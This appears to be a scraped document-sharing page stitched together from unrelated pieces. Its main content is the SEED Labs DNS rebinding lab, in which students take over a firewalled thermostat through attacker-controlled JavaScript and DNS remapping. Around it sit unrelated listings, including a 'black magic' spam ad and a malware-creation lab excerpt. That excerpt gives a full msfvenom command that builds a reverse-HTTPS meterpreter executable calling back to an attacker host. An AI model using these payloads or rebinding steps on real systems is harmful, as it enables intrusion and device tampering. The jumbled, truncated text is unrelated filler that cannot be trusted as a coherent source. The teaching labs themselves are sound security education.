The document describes a DNS rebinding attack lab that aims to demonstrate how DNS rebinding works and help students gain experience using the technique. The lab simulates an IoT device (thermostat) behind a firewall that can be controlled via a web interface. To conduct the attack, the lab sets up a home network with the IoT device and an outside network with the attacker's servers. The attack circumvents the same-origin policy by getting the victim's browser to run the attacker's JavaScript, then using DNS rebinding to change the DNS mapping and redirect requests from the script to the IoT device, allowing temperature manipulation.
Redhat 7 book, this is not a book ,its way to do pass RHCSA ,almost complete syllabus and of course solved.
Without Practice you cant remember linux commands for long time,
MacOS forensics and anti-forensics (DC Lviv 2019) presentationOlehLevytskyi1
MacOS forensics and anti-forensics (DC Lviv 2019) presentation. Prepared specially for DC38032. Prepared by Oleh Levytskyi (https://twitter.com/LeOleg97)
Redhat 7 book, this is not a book ,its way to do pass RHCSA ,almost complete syllabus and of course solved.
Without Practice you cant remember linux commands for long time,
MacOS forensics and anti-forensics (DC Lviv 2019) presentationOlehLevytskyi1
MacOS forensics and anti-forensics (DC Lviv 2019) presentation. Prepared specially for DC38032. Prepared by Oleh Levytskyi (https://twitter.com/LeOleg97)
RH202 CertMagic Exam contains all the questions and answers to pass RH202 IT Exam on first try. The Questions & answers are verified and selected by professionals in the field and ensure accuracy and efficiency throughout the whole Product
Kernel Recipes 2014 - The Linux Kernel, how fast it is developed and how we s...Anne Nicolas
This talk will go into the latest statistics for the development of the Linux kernel.
It will describe how the many thousand developers all work together and are able to release a stable kernel every 3 months with no planning.
Greg Kroah-Hartman, Linux Foundation
Linux Training For Beginners | Linux Administration Tutorial | Introduction T...Edureka!
This Linux training will take you one step closer to becoming a Linux administrator. The most common and important tasks that a Linux admin is responsible for, is covered in this Linux training video. Below are the topics covered in this tutorial:
1) Linux File Permissions
2) ACLs (Access Control Lists)
3) Shell Scripting
4) Patching In Linux
5) Networking In Linux:-
a) SSH For Remote Host Access
b) SFTP For Remote File Transfer
c) SCP For Remote Folder Transfer
Martin Čmelík
Security-Portal.cz, Securix.org
http://www.security-session.cz
Přednáška: Hardening Linuxových systemů a představení distribuce Securix GNU/Linux
Přednáška se bude věnovat možnostem zabezpečení Linuxových systémů od té nejnižší až po aplikační vrstvu. Představí možnosti zvýšení bezpečnosti použitelných na všech linuxových distribucích až po MLS (Multi-Level Security) systémy typu Grsec a PaX, které jsou schopné detailního vymezení opravnění a přístupu k resourcům každé aplikace.
RH202 CertMagic Exam contains all the questions and answers to pass RH202 IT Exam on first try. The Questions & answers are verified and selected by professionals in the field and ensure accuracy and efficiency throughout the whole Product
Kernel Recipes 2014 - The Linux Kernel, how fast it is developed and how we s...Anne Nicolas
This talk will go into the latest statistics for the development of the Linux kernel.
It will describe how the many thousand developers all work together and are able to release a stable kernel every 3 months with no planning.
Greg Kroah-Hartman, Linux Foundation
Linux Training For Beginners | Linux Administration Tutorial | Introduction T...Edureka!
This Linux training will take you one step closer to becoming a Linux administrator. The most common and important tasks that a Linux admin is responsible for, is covered in this Linux training video. Below are the topics covered in this tutorial:
1) Linux File Permissions
2) ACLs (Access Control Lists)
3) Shell Scripting
4) Patching In Linux
5) Networking In Linux:-
a) SSH For Remote Host Access
b) SFTP For Remote File Transfer
c) SCP For Remote Folder Transfer
Martin Čmelík
Security-Portal.cz, Securix.org
http://www.security-session.cz
Přednáška: Hardening Linuxových systemů a představení distribuce Securix GNU/Linux
Přednáška se bude věnovat možnostem zabezpečení Linuxových systémů od té nejnižší až po aplikační vrstvu. Představí možnosti zvýšení bezpečnosti použitelných na všech linuxových distribucích až po MLS (Multi-Level Security) systémy typu Grsec a PaX, které jsou schopné detailního vymezení opravnění a přístupu k resourcům každé aplikace.
This was a workshop I conducted at Black Hat Europe'12. The workshop explains how to program a USB HID, Teensy++ in this case, for usage in offensive security.
PHYSICAL COMPUTING WITH RGB LED OR MATRIX
Today we enter a topic in programming called
embedded computing with the internet; we code a
RGB LED light on a Arduino board with a breadboard
on which we switch off or on the light by a browser
on an android device with our own web server and
their COM or socket protocols too.
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxpauline234567
Lab-10: Malware Creation and Denial of Service (DoS)
In this lab, you will create a malware by using the Metasploit Framework. You will also launch as Denial of Service (DoS) attack.Section-1: Create a Malware
Hackers usually create malicious files for different purposes, such as command and control, defense evasion, and persistence. Pentesters create malicious files for ethical purposes, such as performing tests to check the strength of the existing countermeasures. In this lab, you will create a malicious file, and you will explore the strategies to evade the antivirus systems.
Method-1: Create a malicious file by using msfvenom
1) Log in to Kali VM on your personal computer (as set up in Lab 1).
2) Open a terminal window by clicking the terminal icon on the taskbar.
3) Type
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f exe -o ethical.exe in terminal window and press enter.
You can copy this command and paste it to the terminal window of the Kali VM.
4) After running this command, a file named
ethical.exe will be created.
Notes:
msfvenom is a command-line tool within the Metasploit Framework. It is used to create payloads such as malicious executables such as shellcodes and reverse shells. This page shows the different kinds of malicious shells that can be made by using msfvenom. Have a look at the headings:
https://burmat.gitbook.io/security/hacking/msfvenom-cheetsheet. If you want to learn more about msfvenom, refer to
https://www.offensive-security.com/metasploit-unleashed/msfvenom/
LHOST (Local Host): Specifies the attacker's IP address. When the victim runs this executable, it will establish a connection to that IP address. The IP address is 10.10.10.10. It is a randomly selected IP, and you will not connect to that IP in this lab.
LPORT (Local Port): Specifies the port on which the attacker machine (10.10.10.10) will listen to incoming connections from the victim machine. In this example, when the victim runs the executable, the victim's computer will create a connection to port 443 at the attacker machine (10.10.10.10). After the victim makes a connection to the attacker machine, the attacker can start performing malicious activities, including controlling the victim machine, accessing sensitive information, deleting files, etc.
Using port 443 in this malicious activity is the safest way for hackers because it is one of the ports that is not blocked by the firewalls and routers on the Internet and LANs (Local Area Networks). It is the default port for TLS traffic. (Mostly encrypted web traffic)
Msfvenom uses reverse_https payload to create a malicious file. The malicious file will then make a reverse https connection between the victim's and the attacker's computers once initiated by the victim.
The other parameters of msfvenom are relatively more straightforward. x86 specifies t.
RGB LED in Arduino with an Oscilloscope
• Generating QR Code
• 3D Printing
• Web Video Cam
• Digi Clock with Real Time Clock
• Android SeekBar to Arduino LED Matrix
ZeroVM backgroud: Introduction to some of the concept behind zerovm. Little discussion of google native client project, Software based fault isolation is also provided.
NO1 Uk best vashikaran specialist in delhi vashikaran baba near me online vas...Amil Baba Dawood bangali
Contact with Dawood Bhai Just call on +92322-6382012 and we'll help you. We'll solve all your problems within 12 to 24 hours and with 101% guarantee and with astrology systematic. If you want to take any personal or professional advice then also you can call us on +92322-6382012 , ONLINE LOVE PROBLEM & Other all types of Daily Life Problem's.Then CALL or WHATSAPP us on +92322-6382012 and Get all these problems solutions here by Amil Baba DAWOOD BANGALI
#vashikaranspecialist #astrologer #palmistry #amliyaat #taweez #manpasandshadi #horoscope #spiritual #lovelife #lovespell #marriagespell#aamilbabainpakistan #amilbabainkarachi #powerfullblackmagicspell #kalajadumantarspecialist #realamilbaba #AmilbabainPakistan #astrologerincanada #astrologerindubai #lovespellsmaster #kalajaduspecialist #lovespellsthatwork #aamilbabainlahore#blackmagicformarriage #aamilbaba #kalajadu #kalailam #taweez #wazifaexpert #jadumantar #vashikaranspecialist #astrologer #palmistry #amliyaat #taweez #manpasandshadi #horoscope #spiritual #lovelife #lovespell #marriagespell#aamilbabainpakistan #amilbabainkarachi #powerfullblackmagicspell #kalajadumantarspecialist #realamilbaba #AmilbabainPakistan #astrologerincanada #astrologerindubai #lovespellsmaster #kalajaduspecialist #lovespellsthatwork #aamilbabainlahore #blackmagicforlove #blackmagicformarriage #aamilbaba #kalajadu #kalailam #taweez #wazifaexpert #jadumantar #vashikaranspecialist #astrologer #palmistry #amliyaat #taweez #manpasandshadi #horoscope #spiritual #lovelife #lovespell #marriagespell#aamilbabainpakistan #amilbabainkarachi #powerfullblackmagicspell #kalajadumantarspecialist #realamilbaba #AmilbabainPakistan #astrologerincanada #astrologerindubai #lovespellsmaster #kalajaduspecialist #lovespellsthatwork #aamilbabainlahore #Amilbabainuk #amilbabainspain #amilbabaindubai #Amilbabainnorway #amilbabainkrachi #amilbabainlahore #amilbabaingujranwalan #amilbabainislamabad
COLLEGE BUS MANAGEMENT SYSTEM PROJECT REPORT.pdfKamal Acharya
The College Bus Management system is completely developed by Visual Basic .NET Version. The application is connect with most secured database language MS SQL Server. The application is develop by using best combination of front-end and back-end languages. The application is totally design like flat user interface. This flat user interface is more attractive user interface in 2017. The application is gives more important to the system functionality. The application is to manage the student’s details, driver’s details, bus details, bus route details, bus fees details and more. The application has only one unit for admin. The admin can manage the entire application. The admin can login into the application by using username and password of the admin. The application is develop for big and small colleges. It is more user friendly for non-computer person. Even they can easily learn how to manage the application within hours. The application is more secure by the admin. The system will give an effective output for the VB.Net and SQL Server given as input to the system. The compiled java program given as input to the system, after scanning the program will generate different reports. The application generates the report for users. The admin can view and download the report of the data. The application deliver the excel format reports. Because, excel formatted reports is very easy to understand the income and expense of the college bus. This application is mainly develop for windows operating system users. In 2017, 73% of people enterprises are using windows operating system. So the application will easily install for all the windows operating system users. The application-developed size is very low. The application consumes very low space in disk. Therefore, the user can allocate very minimum local disk space for this application.
Forklift Classes Overview by Intella PartsIntella Parts
Discover the different forklift classes and their specific applications. Learn how to choose the right forklift for your needs to ensure safety, efficiency, and compliance in your operations.
For more technical information, visit our website https://intellaparts.com
Explore the innovative world of trenchless pipe repair with our comprehensive guide, "The Benefits and Techniques of Trenchless Pipe Repair." This document delves into the modern methods of repairing underground pipes without the need for extensive excavation, highlighting the numerous advantages and the latest techniques used in the industry.
Learn about the cost savings, reduced environmental impact, and minimal disruption associated with trenchless technology. Discover detailed explanations of popular techniques such as pipe bursting, cured-in-place pipe (CIPP) lining, and directional drilling. Understand how these methods can be applied to various types of infrastructure, from residential plumbing to large-scale municipal systems.
Ideal for homeowners, contractors, engineers, and anyone interested in modern plumbing solutions, this guide provides valuable insights into why trenchless pipe repair is becoming the preferred choice for pipe rehabilitation. Stay informed about the latest advancements and best practices in the field.
Automobile Management System Project Report.pdfKamal Acharya
The proposed project is developed to manage the automobile in the automobile dealer company. The main module in this project is login, automobile management, customer management, sales, complaints and reports. The first module is the login. The automobile showroom owner should login to the project for usage. The username and password are verified and if it is correct, next form opens. If the username and password are not correct, it shows the error message.
When a customer search for a automobile, if the automobile is available, they will be taken to a page that shows the details of the automobile including automobile name, automobile ID, quantity, price etc. “Automobile Management System” is useful for maintaining automobiles, customers effectively and hence helps for establishing good relation between customer and automobile organization. It contains various customized modules for effectively maintaining automobiles and stock information accurately and safely.
When the automobile is sold to the customer, stock will be reduced automatically. When a new purchase is made, stock will be increased automatically. While selecting automobiles for sale, the proposed software will automatically check for total number of available stock of that particular item, if the total stock of that particular item is less than 5, software will notify the user to purchase the particular item.
Also when the user tries to sale items which are not in stock, the system will prompt the user that the stock is not enough. Customers of this system can search for a automobile; can purchase a automobile easily by selecting fast. On the other hand the stock of automobiles can be maintained perfectly by the automobile shop manager overcoming the drawbacks of existing system.
Vaccine management system project report documentation..pdfKamal Acharya
The Division of Vaccine and Immunization is facing increasing difficulty monitoring vaccines and other commodities distribution once they have been distributed from the national stores. With the introduction of new vaccines, more challenges have been anticipated with this additions posing serious threat to the already over strained vaccine supply chain system in Kenya.
Final project report on grocery store management system..pdfKamal Acharya
In today’s fast-changing business environment, it’s extremely important to be able to respond to client needs in the most effective and timely manner. If your customers wish to see your business online and have instant access to your products or services.
Online Grocery Store is an e-commerce website, which retails various grocery products. This project allows viewing various products available enables registered users to purchase desired products instantly using Paytm, UPI payment processor (Instant Pay) and also can place order by using Cash on Delivery (Pay Later) option. This project provides an easy access to Administrators and Managers to view orders placed using Pay Later and Instant Pay options.
In order to develop an e-commerce website, a number of Technologies must be studied and understood. These include multi-tiered architecture, server and client-side scripting techniques, implementation technologies, programming language (such as PHP, HTML, CSS, JavaScript) and MySQL relational databases. This is a project with the objective to develop a basic website where a consumer is provided with a shopping cart website and also to know about the technologies used to develop such a website.
This document will discuss each of the underlying technologies to create and implement an e- commerce website.
Immunizing Image Classifiers Against Localized Adversary Attacksgerogepatton
This paper addresses the vulnerability of deep learning models, particularly convolutional neural networks
(CNN)s, to adversarial attacks and presents a proactive training technique designed to counter them. We
introduce a novel volumization algorithm, which transforms 2D images into 3D volumetric representations.
When combined with 3D convolution and deep curriculum learning optimization (CLO), itsignificantly improves
the immunity of models against localized universal attacks by up to 40%. We evaluate our proposed approach
using contemporary CNN architectures and the modified Canadian Institute for Advanced Research (CIFAR-10
and CIFAR-100) and ImageNet Large Scale Visual Recognition Challenge (ILSVRC12) datasets, showcasing
accuracy improvements over previous techniques. The results indicate that the combination of the volumetric
input and curriculum learning holds significant promise for mitigating adversarial attacks without necessitating
adversary training.
Student information management system project report ii.pdfKamal Acharya
Our project explains about the student management. This project mainly explains the various actions related to student details. This project shows some ease in adding, editing and deleting the student details. It also provides a less time consuming process for viewing, adding, editing and deleting the marks of the students.
Quality defects in TMT Bars, Possible causes and Potential Solutions.PrashantGoswami42
Maintaining high-quality standards in the production of TMT bars is crucial for ensuring structural integrity in construction. Addressing common defects through careful monitoring, standardized processes, and advanced technology can significantly improve the quality of TMT bars. Continuous training and adherence to quality control measures will also play a pivotal role in minimizing these defects.
2. SEED Labs – DNS Rebinding Attack Lab 2
2 Background: IoT
Our attack target is an IoT device behind the firewall. We cannot directly access this IoT device from
outside. Our goal is to get an inside user to run our JavaScript code, so we can use the DNS rebinding attack
to interact with the IoT device.
Many IoT devices have a simple built-in web server, so users can interact with these devices via web
APIs. Typically, these IoT devices are protected by a firewall, they cannot be accessed directly from outside.
Due to this type of protection, many IoT devices do not implement a strong authentication mechanism. If
attackers can find ways to interact with them, they can easily compromise its security.
We emulate such a vulnerable IoT device using a simple web server, which serves two APIs: password
and temperature. The IoT device can set the room temperature. To do that, we need to send out
an HTTP request to the server’s temperature API; the request should include two pieces of data: the
target temperature value and a password. The password is a secret that changes periodically, but it can be
fetched using the password API. Therefore, to successfully set the temperature, users needs to first get the
password, and then attach the password in the temperature API.
The password is not meant for the authentication purpose; it is used to defeat the Cross-Site Request
Forgery (CSRF) attack. Without this protection, a simple CSRF attack is sufficient; there is no need to use
the more sophisticated DNS rebinding attack. For the sake of simplicity, we hardcoded the password; in real
systems, the password will be re-generated periodically.
3 Lab Environment Setup Using Container
User
VM
IoT Server
192.168.60.80
Web server
DNS server
DNS Server
Local
DNS Server
Router and
Firewall
10.9.0.11
192.168.60.11
Attacker’s
Nameserver
Attacker’s
web server
10.9.0.53 10.9.0.153 10.9.0.180
Home Network: 192.168.60.0/24
192.168.60.1
Figure 1: Lab environment setup
In this lab, we will use six machines. The lab environment setup is illustrated in Figure 1. Only the user
machine will be using VM, and the others are all containers. In the setup, we have two networks, a home
network and an outside network. The home network simulates a typical network at home. The User machine
and the IoT services are connected to this network, which is protected by the firewall on the router container.
The firewall blocks all traffic going to the 192.168.60.80. This way, outside machines cannot access
the IoT device. We also set up a NAT server on the router, so the machines on the home network can access
outside (and the reply packets can come back).
The second network simulates the outside world. In addition to the router, there are three containers
3. SEED Labs – DNS Rebinding Attack Lab 3
attached to this network, one serving as the local DNS server, and the other two serving as the attacker’s
nameserver and web server. The attacker owns the attacker32.com domain, which is hosted by the
attacker’s nameserver container. The web server hosts a malicious website used for the attack.
3.1 Container Setup and Commands
Please download the Labsetup.zip file to your VM from the lab’s website, unzip it, enter the Labsetup
folder, and use the docker-compose.yml file to set up the lab environment. Detailed explanation of the
content in this file and all the involved Dockerfile can be found from the user manual, which is linked
to the website of this lab. If this is the first time you set up a SEED lab environment using containers, it is
very important that you read the user manual.
In the following, we list some of the commonly used commands related to Docker and Compose. Since
we are going to use these commands very frequently, we have created aliases for them in the .bashrc file
(in our provided SEEDUbuntu 20.04 VM).
$ docker-compose build # Build the container image
$ docker-compose up # Start the container
$ docker-compose down # Shut down the container
// Aliases for the Compose commands above
$ dcbuild # Alias for: docker-compose build
$ dcup # Alias for: docker-compose up
$ dcdown # Alias for: docker-compose down
All the containers will be running in the background. To run commands on a container, we often need
to get a shell on that container. We first need to use the "docker ps" command to find out the ID of
the container, and then use "docker exec" to start a shell on that container. We have created aliases for
them in the .bashrc file.
$ dockps // Alias for: docker ps --format "{{.ID}} {{.Names}}"
$ docksh <id> // Alias for: docker exec -it <id> /bin/bash
// The following example shows how to get a shell inside hostC
$ dockps
b1004832e275 hostA-10.9.0.5
0af4ea7a3e2e hostB-10.9.0.6
9652715c8e0a hostC-10.9.0.7
$ docksh 96
root@9652715c8e0a:/#
// Note: If a docker command requires a container ID, you do not need to
// type the entire ID string. Typing the first few characters will
// be sufficient, as long as they are unique among all the containers.
If you encounter problems when setting up the lab environment, please read the “Common Problems”
section of the manual for potential solutions.
3.2 Configure the User VM
We need to provide further configuration on the User VM.
4. SEED Labs – DNS Rebinding Attack Lab 4
Step 1. Reduce Firefox’s DNS caching time. To reduce load on DNS servers and to speed up response
time, Firefox browser caches DNS results. By default, the cache’s expiration time is 60 seconds. That means
that our DNS rebinding attack needs to wait for at least 60 seconds. To make our life easier, we reduce the
time to 10 seconds or less. Type about:config in the URL field. After clicking through a warning page,
we will see a list of preference names and their values. Search for dnsCache, find the following entry and
change its value:
network.dnsCacheExpiration: change its value to 10 (default is 60)
After making the change, we should exit from the Firefox browser, and restart it; otherwise the change
will not take effect.
Step 2. Change /etc/hosts. We need to add the following entry to the /etc/hosts file. We will
use www.seedIoT32.com as the name for the IoT server. Its IP address is 192.168.60.80.
192.168.60.80 www.seedIoT32.com
We can now test the IoT server. Point the browser to the following URL on the User VM. If everything
is set up correctly, we should be able to see a thermostat. We can also change the temperature setting by
dragging the sliding bar. Please provide a screenshot in your lab report.
http://www.seedIoT32.com
Step 3. Local DNS Server. We need to get the User VM to use a particular local DNS server. This is
achieved by setting the local DNS server as the first nameserver entry in the resolver configuration file
(/etc/resolv.conf). One challenge is that the provided VM uses the Dynamic Host Configuration
Protocol (DHCP) to obtain network configuration parameters, such as IP address, local DNS server, etc.
DHCP clients overwrite the /etc/resolv.conf file with the information provided by the DHCP server.
One way to get our information into /etc/resolv.conf without worrying about the DHCP is to
add the following entry to the /etc/resolvconf/resolv.conf.d/head file (10.9.0.53 is the
IP address of the local DNS server in our setup):
nameserver 10.9.0.53
The content of the head file will be prepended to the dynamically generated resolver configuration file.
Normally, this is just a comment line (the comment in /etc/resolv.conf comes from this head file).
After making the change, we need to run the following command for the change to take effect:
$ sudo resolvconf -u
3.3 Testing the Lab Setup.
After configuring the User VM, use the dig command to get the IP address of www.attacker32.com
and ns.attacker32.com. You should get 10.9.0.180 and 10.9.0.153, respectively. If you do
not get this, your lab environment is not set up correctly.
We can now test the attacker’s website. Point the browser to the following URL on the User VM, and
you should be able to see the attacker’s website. Please provide a screenshot in your lab report.
http://www.attacker32.com
5. SEED Labs – DNS Rebinding Attack Lab 5
4 Launch the Attack on the IoT Device
We are ready to launch the attack on the IoT device. To help students understand how the attack works, we
break down the attack into several incremental steps.
4.1 Task 1. Understanding the Same-Origin Policy Protection
In this task, we will do some experiment to understand the same-origin policy protection implemented on
browsers. On the User VM, we will browse the following three URLs. It is better to show these three pages
on three different Firefox windows (instead of on three different tabs), so they are all visible.
URL 1: http://www.seedIoT32.com
URL 2: http://www.seedIoT32.com/change
URL 3: http://www.attacker32.com/change
The first page lets us see the current temperature setting of the thermostat (see Figure 2.a); it fetches the
temperature value from the IoT server once every second. We should keep this page always visible, so we
can see the temperature setting on the thermostat. The second and third pages are identical (see Figure 2.b),
except that one comes from the IoT server, and the other comes from the attacker’s server. When we click
the button on both pages, a request will be sent out to the IoT server to set its temperature. we are supposed
to raise the thermostat’s temperature to 99 Celsius.
(a) http://www.seedIoT32.com
(b) http://www.seedIoT32.com/change and
http://www.attacker32.com/change
(The pages in these two URLs are identical)
Figure 2: The web pages from the three URLs
Click the button on the second and third pages, and describe your observation. Which page can success-
fully set the thermostat’s temperature? Please explain why. To find the reason, click the following menu
sequence from Firefox. A console window will appear, which displays error messages if any. Hint: the
reason is related to the same-origin policy enforced by browsers. Please explain why this policy causes one
of the pages to fail.
Tools -> Web Developer -> Web Console
6. SEED Labs – DNS Rebinding Attack Lab 6
4.2 Task 2. Defeat the Same-Origin Policy Protection
From the previous task, it seems impossible to set the thermostat’s temperature from the attacker’s page, due
to the browser’s same-origin policy protection. The objective of this task is to defeat such a protection, so
we can set the temperature from this page.
The main idea for defeating the same origin protection comes from the fact that the policy enforcement
is based on the host name, not on the IP address, so as long as we use www.attacker32.com in the
URL, we are complying with the SOP policy, but that does not mean we are restricted to communicate with
the www.attacker32.com web server.
Before the user’s browser sends out requests to www.attacker32.com, it first needs to know the IP
address of www.attacker32.com. A DNS request will be sent out from the User’s machine. If the IP ad-
dress is not cached at the local DNS server, a DNS request will eventually be sent to attacker32.com’s
nameserver, which is controlled by the attacker. Therefore, the attacker can decide what to put in the re-
sponse.
Step 1: Modify the JavaScript code. On the attacker’s web server, the JavaScript code running inside
the www.attacker32.com/change page is stored in the following file: /app/rebind_server/
templates/js/change.js. Since this page comes from the www.attacker32.com server, ac-
cording to the same-origin policy, it can only interact with the same server. Therefore, we need to change
the first line of the code from http://www.seediot32.com to the following (we have installed a
simple editor called nano in the container):
let url_prefix = ’http://www.attacker32.com’
After making the change, restart the attacker’s web server container (see the command below). Then go
to the User VM, refresh the page, and click the button again. Do you still see the error message in the web
console? Please explain your observation.
$ docker ps
...
78359039627a attacker-www-10.9.0.180
$ docker container restart 7835
Step 2: Conduct the DNS rebinding. Our JavaScript code sends requests to www.attacker32.com,
i.e., the requests will come back to the Attacker’s web server. That is not what we want; we want the
requests to go to the IoT server. This can be achieved using the DNS rebinding technique. We first map
www.attacker32.com to the IP address of the attacker’s web server, so the user can get the actual page
from http://www.attacker32.com/change. Before we click on the button on the page, we remap
the www.attacker32.com hostname to the IP address of the IoT server, so the request triggered by the
button will go to the IoT server. That is exactly what we want.
To change the DNS mapping, students can modify the zone_attacker32.com file inside attacker’s
nameserver container. The zone file can be found in the /etc/bind folder. The following shows the
content of the zone file. The first entry is the default Time-To-Live (TTL) value (seconds) for the response,
specifying how long the response can stay in the DNS cache. This value may need to be modified. The
following is the content of the zone file:
$TTL 1000
@ IN SOA ns.attacker32.com. admin.attacker32.com. (
7. SEED Labs – DNS Rebinding Attack Lab 7
2008111001
8H
2H
4W
1D)
@ IN NS ns.attacker32.com.
@ IN A 10.9.0.22
www IN A 10.9.0.22
ns IN A 10.9.0.21
* IN A 10.9.0.22
After making the changes to the zone file, run the following command to ask the nameserver to reload
the revised zone data.
# rndc reload attacker32.com
Because of the tasks conducted previously, the DNS mapping for the www.attacker32.com has
already been cached by the local DNS server, it will not expire until 1000 seconds later. To shorten the
waiting, students are allowed to clean out the cache using the following command (on the local DNS server).
However, this can only be conducted before the attack starts. Once the attack starts, students are not allowed
to touch the local DNS server.
// Do it on the local DNS server container
# rndc flush
If both steps in this task are done correctly, clicking the button on the change page from www.
attacker32.com should be able to change the thermostat’s temperature successfully. Please provide
evidence in your report to demonstrate your success.
4.3 Task 3. Launch the Attack
In the previous task, the user has to click the button to set the temperature to the dangerously high value.
Obviously, it is unlikely that users will do that. In this task, we need to do that automatically. We have
already created a web page for that purpose. It can be accessed using the following URL:
http://www.attacker32.com
Once you have loaded this page into the User VM, you should be able to see a page with a timer, which
goes down from 10 to 0. Once it reaches 0, the JavaScript code on this page will send the set-temperature
request to http://www.attacker32.com, and then reset the timer value to 10. Students need to use
the DNS rebinding technique, so once the timer reaches 0, the thermostat’s temperature is set to 88 Celsius.
5 Submission
You need to submit a detailed lab report, with screenshots, to describe what you have done and what you
have observed. You also need to provide explanation to the observations that are interesting or surprising.
Please also list the important code snippets followed by explanation. Simply attaching code without any
explanation will not receive credits.